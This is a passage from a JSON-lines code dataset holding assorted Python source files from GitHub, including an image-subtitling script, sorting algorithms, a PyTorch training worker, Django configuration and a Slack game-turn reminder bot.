","repo_name":"killswitchh/Leetcode-Problems","sub_path":"Easy/maximum-number-of-balloons.py","file_name":"maximum-number-of-balloons.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"47382201382","text":"#!/usr/bin/env python3\n\nimport cv2\nimport numpy as np\nimport argparse\n\nimport alphabet\n\nparser=argparse.ArgumentParser(description=\"adds text to images\")\n#about picture\nparser.add_argument(\"picture\", help=\"picture which needs the subtitles\", type=str)\nparser.add_argument(\"size\", help= \"percentage of the image, default 40\",type=int ,nargs='?',const=1,default=40)\n\n#about text\nparser.add_argument(\"x\",help=\"x position for text, default 351\",type=int,nargs='?',const=1,default=351)\nparser.add_argument(\"y\", help= \"y position for text, default 2\",type=int,nargs='?',const=1,default=2)\nparser.add_argument(\"text\",help=\"write for making subtitles\",type=str)\n\nargs=parser.parse_args()\n\nsentence=args.text\n\n\n\n\n#picture name\npic=args.picture\n\nscreen=cv2.imread(f\"{pic}\")\n\n#picture size\nscale_percent = args.size #40\nwidth = int(screen.shape[1] * scale_percent / 100)\nheight = int(screen.shape[0] * scale_percent / 100)\ndim = (width, 
height)\n \n#resized image\nscreen = cv2.resize(screen, dim)\n\n\"\"\"\n#just for white picture\n\n#that was the screen size\nr,c = 360, 720\n\nscreen=[[0 for col in range(c)] for rows in range(r)] \nfor i in range(r):\n for j in range(c):\n screen[i][j]=[255,255,255]\n\"\"\"\n \n#writing every letter side by side from text\n\ndef word_picture(sentence):\n pics=[]\n #if there is white space between words add empty\n for word in sentence: \n if word.isspace():\n new_word=alphabet.empty\n each_word=alphabet.word_coloring(new_word)\n each_W=np.array(each_word,dtype=np.uint8)\n pics += [each_W]\n \n # letters \n else: \n\n i=alphabet.letters_list.index(f\"{word}\")\n new_word=alphabet.letters[i]\n each_word=alphabet.word_coloring(new_word)\n each_W=np.array(each_word,dtype=np.uint8)\n pics += [each_W] #adding every letters' matrix value to the list\n return pics \n\n\neW = word_picture(sentence) \n\n#adding the text to the picture \nfor k in range(len(eW)):\n for i in range(9):\n for j in range(9): \n screen[args.x +i][ args.y +9*k +j] = eW[k][i][j] \n pass\n\n#positons of the text arg.x=351 args.y=2\n#matrix to image\nscreen_array=np.array(screen,dtype=np.uint8)\ncv2.imshow('white', screen_array)\n\ncv2.waitKey(0) # waits until a key is pressed\ncv2.destroyAllWindows() # destroys the window showing image\n","repo_name":"devran1/adding_subtitles","sub_path":"add-text.py","file_name":"add-text.py","file_ext":"py","file_size_in_byte":2397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71292873371","text":"import requests\nimport random\nimport time\n\n\n# Playlist Cloudstorage String Generator - Made by Fevers#3474 #\n\n\n#----------#\nGrabByID = 'True'\n#----------#\n\nGrabByID = GrabByID.title()\n\nprint('Do you want to grab a playlist name (1) or a playlist ID (2)?')\ninput1 = input('>> ')\ninput1 = input1.title()\nif input1 == '1':\n GrabByID = 'False'\nelif input1 == '2':\n GrabByID = 'True'\nelse:\n print('Incorrect answer, defaulted to False.')\n GrabByID = 'False'\n\nif GrabByID != 'True':\n print('\\nWhat playlist name do you want to grab?')\nelse:\n print('\\nWhat playlist ID do you want to grab?')\nask = input('>> ')\nask = ask.title()\n\nfile1 = open('ids.txt', 'w')\nfile1.writelines('')\nfile1.close()\n\nresponse = requests.get('https://fortnite-api.com/v1/playlists')\n\nprint(f'\\nAll IDs for the {ask} LTM:\\n')\n\nlines = ''\ntry:\n if GrabByID != 'True':\n for i in response.json()['data']:\n if ask == i['name']:\n id = i['id']\n lines += f'{id}\\n'\n print(f'- {id}')\n else:\n lines += f'{ask}\\n'\n print(f'- {ask}')\nexcept:\n print('Could not find ltm')\n time.sleep(2)\n exit()\n\nfile1 = open('ids.txt', 'w')\nfile1.writelines(lines)\nfile1.close()\n\nfile1 = open('ids.txt', 'r')\nlines = file1.readlines()\n \nnumber = random.randint(1, 999)\nstrings = ''\n\nfile1 = open('ids.txt', 'w')\nfile1.writelines(lines)\nfile1.writelines('\\nStrings:\\n\\n')\nfor line in lines:\n #print(f'{line}'.format(line.strip()))\n number = random.randint(1, 999)\n category = random.randint(0, 2)\n if GrabByID != 'True':\n print(f'\\n+FrontEndPlaylistData=(PlaylistName={line}, PlaylistAccess=(bEnabled=true, CategoryIndex={category}, DisplayPriority={number}))')\n strings += f'+FrontEndPlaylistData=(PlaylistName={line}, PlaylistAccess=(bEnabled=true, CategoryIndex={category}, DisplayPriority={number}))\\n'\n else:\n print(f'\\n+FrontEndPlaylistData=(PlaylistName={ask}, PlaylistAccess=(bEnabled=true, CategoryIndex={category}, 
DisplayPriority={number}))')\n strings += f'+FrontEndPlaylistData=(PlaylistName={ask}, PlaylistAccess=(bEnabled=true, CategoryIndex={category}, DisplayPriority={number}))\\n'\n file1.writelines(strings)\nfile1.close()\n\nprint('\\n\\nWrote files to ids.txt. Copy all of the id strings and place them in DefaultGame.ini to add it to your LTM list. \\nMake sure the string is one line.')\ntime.sleep(10)","repo_name":"CyberDomLeaks/BetterFN","sub_path":"src/cloudstorage/playlist_generator.py","file_name":"playlist_generator.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9621837388","text":"\n\"\"\"\n\"\"\"\n\n# Native\nimport time\nimport pprint\nfrom collections import OrderedDict\nimport json\n\n# 3rd-Party\nfrom sqlalchemy import Table, Column, ForeignKey, Integer, String, Boolean, Float\nfrom sqlalchemy.orm import relationship, backref\n\nimport pydash\n\n#\nfrom foe.request import Request\nfrom foe.models.model import Model\nfrom foe.models.city import City\nfrom foe.models.player import Player\nfrom foe.models.tavern import Tavern\nfrom foe.models.resources import Resources\nfrom foe.models.hiddenReward import HiddenReward\n\n\nclass Account(Model):\n \"\"\"\n \"\"\"\n\n REQUEST_CLASS = \"StartupService\"\n\n __tablename__ = 'account'\n\n # Attributes\n # ---------------------------------------------------------\n\n player_id = Column(Integer, primary_key=True, default=0)\n\n id = Column(String, default=0)\n\n user_name = Column(String, default='', unique=True)\n\n # Back-refs\n # ---------------------------------------------------------\n\n # Containers\n # ---------------------------------------------------------\n\n city = relationship(City, backref=backref('account', uselist=False), uselist=False)\n\n players = relationship(Player, backref=backref('account', uselist=False))\n\n taverns = relationship(Tavern, backref=backref('account', uselist=False))\n\n resources = relationship(Resources, backref=backref('account', uselist=False), uselist=False)\n\n hiddenRewards = relationship(HiddenReward, backref=backref('account', uselist=False))\n\n def __repr__(self):\n \"\"\"\n \"\"\"\n\n return \"Account %s (%s)\" % (self.player_id, self.user_name)\n\n def fetch(self):\n \"\"\"\n Does a HTTP request to get the start up blob for the city, then populates the models\n \"\"\"\n\n print(\"%s fetching...\" % (self))\n\n timer = time.time()\n\n data = self.request('getData', [])\n\n account = Request.service(data, 'StartupService')\n account['taverns'] = Request.method(data, 'getOtherTavernStates')\n account['resources'] = Request.method(data, 'getPlayerResources')['resources']\n # account['hiddenRewards'] = Request.method(data, 'getOverview')['hiddenRewards']\n\n self.update(**account)\n\n print(\"%s fetched in %.2fs\" % (self, time.time() - timer))\n\n return self\n\n def updateFromResponse(self, data):\n \"\"\"\n \"\"\"\n\n if not data:\n return self\n\n resources = Request.method(data, 'getPlayerResources')['resources']\n\n if resources:\n self.resources.update(**resources)\n\n return self\n\n def populate(self, *args, **kwargs):\n \"\"\"\n \"\"\"\n\n user = kwargs.pop('user_data')\n social = kwargs.pop('socialbar_list')\n taverns = kwargs.pop('taverns')\n city = kwargs.pop('city_map')\n resources = kwargs.pop('resources')\n # hiddenRewards = kwargs.pop('hiddenRewards')\n\n for key in ['player_id', 'user_name']:\n setattr(self, key, user[key])\n\n for key in list(kwargs.keys()):\n 
kwargs.pop(key)\n\n # City\n\n if not self.city:\n self.city = City(account=self)\n\n self.city.update(**city)\n\n # Players\n\n for raw_player in social:\n\n player = self.session.query(Player).filter_by(player_id=raw_player['player_id']).first()\n if not player:\n player = Player(account=self)\n\n player.update(**raw_player)\n\n # Taverns\n\n for raw_tavern in taverns:\n\n tavern = self.session.query(Tavern).filter_by(ownerId=raw_tavern['ownerId']).first()\n if not tavern:\n tavern = Tavern(account=self)\n\n tavern.update(**raw_tavern)\n\n # Resources\n\n if not self.resources:\n self.resources = Resources(account=self)\n\n self.resources.update(**resources)\n\n # hiddenRewards\n \"\"\"\n for raw_hiddenReward in hiddenRewards:\n\n hiddenReward = self.session.query(HiddenReward).filter_by(hiddenRewardId=raw_hiddenReward['hiddenRewardId']).first()\n if not hiddenReward:\n hiddenReward = HiddenReward(account=self)\n\n hiddenReward.update(**raw_hiddenReward)\n \"\"\"\n\n return super(Account, self).populate(*args, **kwargs)\n","repo_name":"mcorbug/foeBot","sub_path":"foe/models/account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":4276,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"19217099847","text":"n = 5\nans=0\n# for i in range(2,n+1):\n# cnt=0\n# for j in range(1,n+1):\n# if i%j==0:\n# cnt+=1\n# if cnt<=2:\n# ans+=1\nlst=[False, False] + [True] * (n-1)\nanswer=[]\nfor i in range(2,n+1):\n if lst[i]:\n answer.append(i)\n for j in range(2*i, n+1,i):\n lst[j] = False\n\nprint(len(answer))","repo_name":"CompletelyPark/python","sub_path":"programmers/소수 찾기.py","file_name":"소수 찾기.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"22940777995","text":"\n\nfrom typing import List\nimport random\n\n\nclass Sorting:\n def bubble_sort(self, nums: List[int]) -> List[int]:\n '''\n Bubble Sort\n TIME COMPLEXITY: O(N^2)\n SPACE COMPLEXITY: O(1)\n '''\n n = len(nums)\n for i in range(n - 1):\n for j in range(0, n - i - 1):\n if nums[j] > nums[j + 1]:\n tmp = nums[j]\n nums[j] = nums[j + 1]\n nums[j + 1] = tmp\n return nums\n\n def merge_sort(self, nums: List[int]) -> List[int]:\n '''\n Merge Sort\n TIME COMPLEXITY: O(NlogN)\n SPACE COMPLEXITY: O(N)\n '''\n def merge(arr1: List[int], arr2: List[int]) -> List[int]:\n res = []\n i, j = 0, 0\n while i < len(arr1) and j < len(arr2):\n if arr1[i] < arr2[j]:\n res.append(arr1[i])\n i += 1\n else:\n res.append(arr2[j])\n j += 1\n if i < len(arr1):\n res += arr1[i:len(arr1)]\n else:\n res += arr2[j:len(arr2)]\n return res\n\n if len(nums) == 1:\n return nums\n\n mid = (len(nums) - 1) // 2\n arr1 = self.merge_sort(nums[:mid + 1])\n arr2 = self.merge_sort(nums[mid+1:])\n return merge(arr1, arr2)\n\n def quick_sort(self, nums: List[int]) -> List[int]:\n def random_pivot(arr: List[int], low: int, high: int):\n pivot = random.randrange(low, high)\n arr[pivot], arr[low] = arr[low], arr[pivot]\n\n def partition(arr: List[int], low: int, high: int):\n random_pivot(arr, low, high)\n pivot = arr[low]\n i = low + 1\n for j in range(i + 1, high + 1):\n if arr[j] < pivot:\n arr[i], arr[j] = arr[j], arr[i]\n i += 1\n arr[i-1], arr[low] = arr[low], arr[i - 1]\n return i - 1\n\n def quick_sort(arr: List[int], low: int, high: int):\n # print(arr[low:high + 1])\n if low < high:\n pivot = partition(arr, low, high)\n quick_sort(arr, low, pivot - 1)\n quick_sort(arr, pivot + 1, high)\n return 
arr\n return quick_sort(nums, 0, len(nums) - 1)\n\n def process(self, input_nums: List[List[int]]):\n bubble_sort_result = []\n merge_sort_result = []\n quick_sort_result = []\n for nums in input_nums:\n print(nums)\n bubble_sort_result.append(self.bubble_sort(nums))\n print(nums)\n merge_sort_result.append(self.merge_sort(nums[:]))\n quick_sort_result.append(self.quick_sort(nums[:]))\n \n \n print(input_nums)\n\n # print(bubble_sort_result)\n # print(merge_sort_result)\n # print(quick_sort_result)\n # print(input_nums)\n\n\ninput_nums = [\n [3, 2, 5, 1, 7, 6, 8],\n [9, 8, 7, 6, 5, 4, 3, 2, 1],\n [2, 3, 3, 4, 5, 7, 8, 9],\n [2, 2, 2, 2, 2, 2, 2, 2]\n]\n\nSorting().process(input_nums)\n","repo_name":"vrdong/leetcode_challenge","sub_path":"sorting/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3107,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"20860684284","text":"import json\nimport serial\nimport sys\n\nfrom smartmeter.library import get_configured_logger\n\n\nclass SerialConfigException(ValueError):\n \"\"\"A placeholder class for all exceptions to the Serial Configuration\"\"\"\n pass\n\n\nclass SerialConfig:\n \"\"\"A class to provide the datastructure for all serial configuration details\"\"\"\n\n def __init__(\n self,\n baudrate: int = None,\n bytesize: int = None,\n parity: str = None,\n stopbits: int = None,\n xonxoff: bool = None,\n rtscts: bool = None,\n timeout: int = None,\n port: str = None\n ):\n \"\"\"\n Note: see pyserial for detail explaination of parameters\n\n :param baudrate: Default value: 9600\n :type baudrate: int\n\n :param bytesize: Default value: 7\n :type bytesize: int\n\n :param parity: Default value: E\n :type parity: str\n\n :param stopbits: Default value: 1\n :type stopbits: int\n\n :param xonxoff: Default value: False\n :type xonxoff: bool\n\n :param rtscts: Default value: False\n :type rtscts: bool\n\n :param timeout: Timeouts in seconds between telegrams. Default value: 20\n :type timeout: int\n\n :param port: Device path for serial device. Default value: /dev/ttyUSB0\n :type port: str\n\n \"\"\"\n # Assign variables:\n self.baudrate = baudrate if baudrate is not None else 9600\n self.bytesize = bytesize if bytesize is not None else serial.SEVENBITS\n self.parity = parity if parity is not None else serial.PARITY_EVEN\n self.stopbits = stopbits if stopbits is not None else serial.STOPBITS_ONE\n self.xonxoff = xonxoff if xonxoff is not None else False\n self.rtscts = rtscts if rtscts is not None else False\n self.timeout = timeout if timeout is not None else 20\n self.port = port if port is not None else \"/dev/ttyUSB0\"\n\n @property\n def baudrate(self):\n return self._baudrate\n\n @baudrate.setter\n def baudrate(self, value: int):\n if value is not None:\n self._baudrate = value\n else:\n raise SerialConfigException(\"Baudrate invalid\")\n\n @property\n def bytesize(self):\n return self._bytesize\n\n @bytesize.setter\n def bytesize(self, value: int):\n byte_sizes = [serial.FIVEBITS, serial.SIXBITS, serial.SEVENBITS, serial.EIGHTBITS]\n if value in byte_sizes:\n self._bytesize = value\n else:\n raise SerialConfigException(f\"Baudrate invalid. Valid values: {byte_sizes}\")\n\n @property\n def parity(self):\n return self._parity\n\n @parity.setter\n def parity(self, value: str):\n if value.upper() in serial.PARITY_NAMES.keys():\n self._parity = value.upper()\n else:\n raise SerialConfigException(f\"Parity invalid. 
Valid values: {list(serial.PARITY_NAMES.keys())}\")\n\n @property\n def stopbits(self):\n return self._stopbits\n\n @stopbits.setter\n def stopbits(self, value: int):\n stopbits = [serial.STOPBITS_ONE, serial.STOPBITS_ONE_POINT_FIVE, serial.STOPBITS_TWO]\n if value in stopbits:\n self._stopbits = value\n else:\n raise SerialConfigException(f\"Stopbits invalid. Valid values: {stopbits}\")\n\n @property\n def xonxoff(self):\n return self._xonxoff\n\n @xonxoff.setter\n def xonxoff(self, value: bool):\n xonxoff_values = [True, False]\n if value in xonxoff_values:\n self._xonxoff = value\n else:\n raise SerialConfigException(f\"Xonxoff invalid. Valid values: {xonxoff_values}\")\n\n @property\n def rtscts(self):\n return self._rtscts\n\n @rtscts.setter\n def rtscts(self, value: int):\n if value is not None:\n self._rtscts = value\n else:\n raise SerialConfigException(\"rtscts invalid\")\n\n @property\n def port(self):\n return self._port\n\n @port.setter\n def port(self, value: str):\n if value is not None:\n self._port = value\n else:\n raise SerialConfigException(\"Port invalid\")\n\n\ndef load_from_file(filename: str) -> SerialConfig:\n \"\"\"Load the configuration from a file\n\n :param filename: The filename to use\n :type filename: str\n\n :rtype: SerialConfig\n :returns: A SerialsConfig object with all needed settings\n\n :exception: SerialConfigException\n :exception: OSError\n \"\"\"\n\n logger = get_configured_logger()\n\n try:\n with open(filename) as file_handler:\n configuration_file_content = json.load(file_handler)\n except OSError as e:\n msg = f\"Can not process file '{filename}' because of eror: {str(e)}\"\n logger.critical(msg)\n sys.exit(1)\n\n # TODO:\n # - validate the dict we got from the configuration file\n # - return dict\n","repo_name":"jvingen/pi1","sub_path":"src/smartmeter/configuration/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9456579932","text":"\"\"\"\nHue tap button setup.\nControl fountain, conservatory lights, dining room lights, and media players (audio).\n\"\"\"\n\nimport appdaemon.plugins.hass.hassapi as hass\n\nclass Remote(hass.Hass):\n\n def initialize(self):\n\n if 'event' in self.args:\n self.listen_event(self.button_click, self.args['event'])\n\n\n def button_click(self, event_name, data, kwargs):\n \"\"\"\n data['event'] is either:\n\n 34 = button 1\n 16 = button 2\n 17 = button 3\n 18 = button 4\n\n \"\"\"\n self.log('testing')\n\n if data['id'] == self.args['id']: # Tap 1\n if data['event'] == 34: # Button 1\n self.toggle(self.args['entity_1'])\n elif data['event'] == 16: # Button 2\n self.toggle(self.args['entity_2'])\n elif data['event'] == 17: # Button 3\n self.toggle(self.args['entity_3'])\n elif data['event'] == 18: # Button 4\n self.toggle(self.args['entity_4'])\n\n\n # if any(self.args[\"entity_4\"] == \"playing\"):\n # for entity in self.args[\"entity_4\"]:\n # self.call_service(\"media_player.media_pause\",entity)\n # elif any(self.args[\"entity_4\"] == \"paused\"):\n # for entity in self.args[\"entity_4\"]:\n # self.call_service(\"media_player.media_play\",entity)\n","repo_name":"Aephir/HomeAssistantConfig","sub_path":"appdaemon/apps/remotes/hue_tap_1.py","file_name":"hue_tap_1.py","file_ext":"py","file_size_in_byte":1427,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"5656602713","text":"# -*-coding:utf-8 -*-\n\"\"\"\n:创建时间: 
2023/2/14 21:13\n:作者: 苍之幻灵\n:我的主页: https://cpcgskill.com\n:Github: https://github.com/cpcgskill\n:QQ: 2921251087\n:aboutcg: https://www.aboutcg.org/teacher/54335\n:bilibili: https://space.bilibili.com/351598127\n:爱发电: https://afdian.net/@Phantom_of_the_Cang\n\n\"\"\"\nfrom __future__ import unicode_literals, print_function, division\n\nimport contextlib\nimport json\nimport logging\nimport time\nimport random\n\nimport cachetools\nimport torch\nfrom torch.utils.data import DataLoader, TensorDataset\n\nimport sgt.models as sgt_models\nfrom sgt.db import get_grid_fs_bucket, get_collection\n\n# batch_size = 8192\n# save_interval = 8\nbatch_size = 256\nsave_interval = 256\nsuccess_sleep_seconds = 0.3\ndefault_sleep_seconds = 0.1\nfail_sleep_seconds = 0.6\nis_cat_do_time = True\n\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n\nlogging.basicConfig(\n level=logging.DEBUG,\n)\n\nlogger = logging.getLogger(name=__name__)\nlogger.setLevel(logging.INFO)\n\n\ndef info(*args):\n logger.info(' '.join(['{}'.format(i) for i in args]))\n\n\n@contextlib.contextmanager\ndef timing(work_name):\n if is_cat_do_time:\n start = time.process_time()\n yield\n end = time.process_time()\n info('执行', work_name, '耗时', end - start)\n else:\n yield\n\n\n@cachetools.cached(cachetools.TTLCache(maxsize=16, ttl=30))\ndef load_data(checkpoint_id):\n fs_bucket = get_grid_fs_bucket()\n collection = get_collection('data')\n if collection.count_documents({'checkpoint_id': checkpoint_id}) > 0:\n docs = collection.find({'checkpoint_id': checkpoint_id})\n data_list = []\n label_list = []\n for i in docs:\n with fs_bucket.open_download_stream_by_name(i['data_file_name']) as stream:\n data_and_label = json.loads(stream.read())\n data, label = zip(*data_and_label)\n data = torch.Tensor(data)\n label = torch.Tensor(label)\n data_list.append(data)\n label_list.append(label)\n data = torch.cat(data_list)\n label = torch.cat(label_list)\n # 将训练数据的特征和标签组合\n dataset = TensorDataset(data, label)\n return DataLoader(\n dataset,\n batch_size,\n shuffle=True,\n pin_memory=True,\n )\n else:\n return None\n\n\ndef remake_tensor_by_device(d):\n return d.to(device) if d.device != device else d\n\n\ndef remake_tensor_list_by_device(*data_list):\n return (remake_tensor_by_device(d) for d in data_list)\n\n\ndef train_model(checkpoint_id):\n collection = get_collection('checkpoint')\n\n doc = collection.find_one({'_id': checkpoint_id})\n if doc is None:\n time.sleep(fail_sleep_seconds)\n return\n\n model = sgt_models.load_checkpoint_from_gridfs(doc['model_type'], doc['checkpoint_file_id'])\n\n data_iter = load_data(checkpoint_id)\n if data_iter is None:\n time.sleep(fail_sleep_seconds)\n return\n\n with timing('train_model(checkpoint_id={}, batch_size={}, save_interval={})'.format(\n checkpoint_id,\n batch_size,\n save_interval\n )):\n for _ in range(save_interval):\n x, y = remake_tensor_list_by_device(*next(iter(data_iter)))\n if torch.max(model.train(x, y).data) < 0.01:\n break\n\n if collection.count_documents({'_id': checkpoint_id}) < 1:\n return\n sgt_models.update_checkpoint_to_gridfs(model, doc['checkpoint_file_id'])\n\n\ndef train_all_model():\n collection = get_collection('checkpoint')\n checkpoint_count = collection.count_documents({})\n if checkpoint_count <= 0:\n time.sleep(success_sleep_seconds)\n return\n\n checkpoint_id_list = [doc['_id'] for doc in collection.find()]\n\n random.shuffle(checkpoint_id_list)\n\n for checkpoint_id in checkpoint_id_list:\n train_model(checkpoint_id)\n\n\ndef main():\n while 
True:\n try:\n train_all_model()\n time.sleep(success_sleep_seconds)\n except Exception as e:\n time.sleep(fail_sleep_seconds)\n logging.error('train_all_model({})'.format(repr(e)))\n\n\ndef test():\n while True:\n train_all_model()\n\n\nif __name__ == '__main__':\n test()\n","repo_name":"cpcgskill/sgt","sub_path":"sgt/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4296,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"40028150347","text":"from django.conf.urls import url\nfrom . import views\nurlpatterns = [\n url(r'^$', views.home),\n url(r'^main$', views.index),\n url(r'^reg$', views.reg),\n url(r'^login$', views.login),\n url(r'^quotes$', views.quotes),\n url(r'^logout$', views.logout),\n url(r'^addquote$', views.addquote),\n url(r'^addfav/(?P\\d+)$', views.addfav),\n url(r'^removefav/(?P\\d+)$', views.removefav),\n url(r'^user/(?P\\d+)$', views.userpage), \n]\n","repo_name":"jinjiang88/pythonbeltexam","sub_path":"apps/pythonexam_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38827078619","text":"import asyncio\nimport os\nimport slack\nfrom slack import RTMClient\nimport json\nimport logging\n\n# create logger\nlogger = logging.getLogger('loggymclogface')\nlogger.setLevel(logging.INFO)\n\n# create console handler and set level to debug\nch = logging.StreamHandler()\nch.setLevel(logging.INFO)\n# create formatter\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n\n# add formatter to ch\nch.setFormatter(formatter)\n\n# add ch to logger\nlogger.addHandler(ch)\n\n#TODO TOKEN = XXX\n#TODO combine datastructures into a 'players' list with players objects\nclient = slack.WebClient(token=TOKEN)\nPLAYERS = [\n# [ 'bob', 'slack user id' ],\n]\n\nCHANNEL_IDS = {\n # 'slack user id': 'slackbot channel w user',\n}\n\n\nCURRENT_TURN_POINTER = 2\nPESTER_TASK = None\n\ndef get_users():\n client.users_list()\n xx =client.users_list()\n for d in xx.data['members']:\n print(d['name'], d['id'], d['group'])\n\nasync def heartbeat():\n # for testing\n while True:\n print('hb')\n await asyncio.sleep(1)\n\nasync def schedule_pester(wait_t, web_client, channel_id, user):\n await asyncio.sleep(wait_t)\n web_client.chat_postMessage(\n channel=channel_id,\n text=f'hey there <@{user}>, it looks like you havent made a move in {wait_t} seconds. 
This is a casual reminder.',\n ) \n\n#def run_bot():\n@RTMClient.run_on(event=\"message\")\nasync def say_hello(**payload):\n global CURRENT_TURN_POINTER\n global PESTER_TASK\n data = payload['data']\n web_client = payload['web_client']\n name = data['username'] if 'username' in data else data.get('channel', None) \n logger.info(f'{name} says {data[\"text\"]}')\n if ('text' in data) and ('bot_id' not in data):\n channel_id = data['channel']\n if 'Hello' in data['text']:\n thread_ts = data['ts']\n user = data['user']\n\n web_client.chat_postMessage(\n channel=channel_id,\n text=f\"Hi <@{user}>!\",\n thread_ts=thread_ts\n )\n \n if 'reg' in data['text']:\n CHANNEL_IDS[data['user']] = channel_id\n with open('data.txt', 'w') as f:\n f.write(f'{data[\"user\"]}: {channel_id}\\n')\n web_client.chat_postMessage(\n channel=channel_id,\n text=f'registered <@{data[\"user\"]}>',\n ) \n try:\n if 'start' in data['text']:\n web_client.chat_postMessage(\n channel=CHANNEL_IDS[PLAYERS[CURRENT_TURN_POINTER][1]],\n text=f'its your turn'\n ) \n if PESTER_TASK is not None:\n PESTER_TASK.cancel()\n PESTER_TASK = None\n PESTER_TASK = asyncio.ensure_future(schedule_pester(3600,\n web_client,\n CHANNEL_IDS[PLAYERS[CURRENT_TURN_POINTER][1]],\n CHANNEL_IDS[PLAYERS[CURRENT_TURN_POINTER][0]]))\n if data['text'] in ['done', 'Done']:\n if PLAYERS[CURRENT_TURN_POINTER][1] == data['user']:\n web_client.chat_postMessage(\n channel=CHANNEL_IDS[PLAYERS[CURRENT_TURN_POINTER][1]],\n text=f'your turn is done'\n )\n CURRENT_TURN_POINTER += 1\n if CURRENT_TURN_POINTER == len(PLAYERS):\n CURRENT_TURN_POINTER = 0\n print(f'go {PLAYERS[CURRENT_TURN_POINTER][0]}!!!!')\n web_client.chat_postMessage(\n channel=CHANNEL_IDS[PLAYERS[CURRENT_TURN_POINTER][1]],\n text=f'its your turn. the first few turns will be boring and quick!'\n )\n if PESTER_TASK is not None:\n PESTER_TASK.cancel()\n PESTER_TASK = None\n PESTER_TASK = asyncio.ensure_future(schedule_pester(3600,\n web_client,\n CHANNEL_IDS[PLAYERS[CURRENT_TURN_POINTER][1]],\n CHANNEL_IDS[PLAYERS[CURRENT_TURN_POINTER][0]]))\n else:\n web_client.chat_postMessage(\n channel=CHANNEL_IDS[data['user']],\n text=f'stay engaged, it is not your turn'\n )\n if 'skip' in data['text']:\n print('skipping: ', PLAYERS[CURRENT_TURN_POINTER][0])\n CURRENT_TURN_POINTER += 1\n if CURRENT_TURN_POINTER == len(PLAYERS):\n CURRENT_TURN_POINTER = 0\n web_client.chat_postMessage(\n channel=CHANNEL_IDS[PLAYERS[CURRENT_TURN_POINTER][1]],\n text=f'its your turn'\n )\n except Exception as ex:\n print('exception!!!', ex)\n \n#rtm_client = RTMClient(token=TOKEN)\n#rtm_client.start()\n\nif __name__ == '__main__':\n #get_users()\n LOOP = asyncio.get_event_loop()\n rtm_client = RTMClient(token=TOKEN)\n# asyncio.ensure_future(heartbeat())\n LOOP.run_until_complete(rtm_client.start())\n\n# run_bot()\n","repo_name":"all2ham/civbot","sub_path":"civbot.py","file_name":"civbot.py","file_ext":"py","file_size_in_byte":5438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"13026358058","text":"\"\"\"\nASGI config for backend project.\n\nIt exposes the ASGI callable as a module-level variable named ``application``.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/4.1/howto/deployment/asgi/\n\"\"\"\n\nimport os\nfrom channels.routing import ProtocolTypeRouter, URLRouter, ChannelNameRouter\nfrom channels.security.websocket import AllowedHostsOriginValidator\nfrom django.core.asgi import get_asgi_application\nfrom birdnest.consumers import 
PilotListConsumer\n\n# os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'backend.settings_dev')\n\n# set settings file to use\nuse_prod_settings = os.environ.get('DJANGO_PRODUCTION', 'false')\nif use_prod_settings == 'false':\n print('Using development settings.')\n os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'backend.settings_dev')\nelse:\n print('Using production settings.')\n os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'backend.settings')\n\ndjango_asgi_application = get_asgi_application()\n\nimport birdnest.routing\n\napplication = ProtocolTypeRouter(\n {\n \"http\": django_asgi_application,\n \"websocket\": URLRouter(birdnest.routing.urlpatterns),\n \"channel\": ChannelNameRouter(\n {\n \"pilot_list\": PilotListConsumer.as_asgi(),\n }\n ),\n }\n)\n","repo_name":"hjeronen/project_birdnest_2023","sub_path":"backend/backend/asgi.py","file_name":"asgi.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38251042113","text":"import wx\nfrom gdata import dat\n\nfrom resource import resource_path\n\nclass BuzzerConfigPanel(wx.Panel):\n \"\"\"This Panel holds the widgets to configure the keystrokes used on the buzzers.\"\"\"\n def __init__(self, parent, *args, **kwargs):\n wx.Panel.__init__(self, parent, *args, **kwargs)\n self.parent = parent\n self.contestantAKey = wx.TextCtrl(self, size=(140, -1))\n self.contestantBKey = wx.TextCtrl(self, size=(140, -1))\n\n # we're using .lower() to make it appear as though the\n # interface uses lowercase letters, in the interest of\n # user-friendliness.\n self.contestantAKey.SetValue(str(dat.getKeycodes()[0] or '').lower())\n self.contestantBKey.SetValue(str(dat.getKeycodes()[1] or '').lower())\n \n self.finishButton = wx.Button(self, label='Finish')\n \n self.sizer = wx.GridBagSizer(4, 3)\n self.sizer.Add(wx.StaticText(self, label=\"Contestant A Key:\"), (0, 0))\n self.sizer.Add(wx.StaticText(self, label=\"Contestant B Key:\"), (0, 1))\n self.sizer.Add(self.contestantAKey, (1, 0))\n self.sizer.Add(self.contestantBKey, (1, 1))\n\n 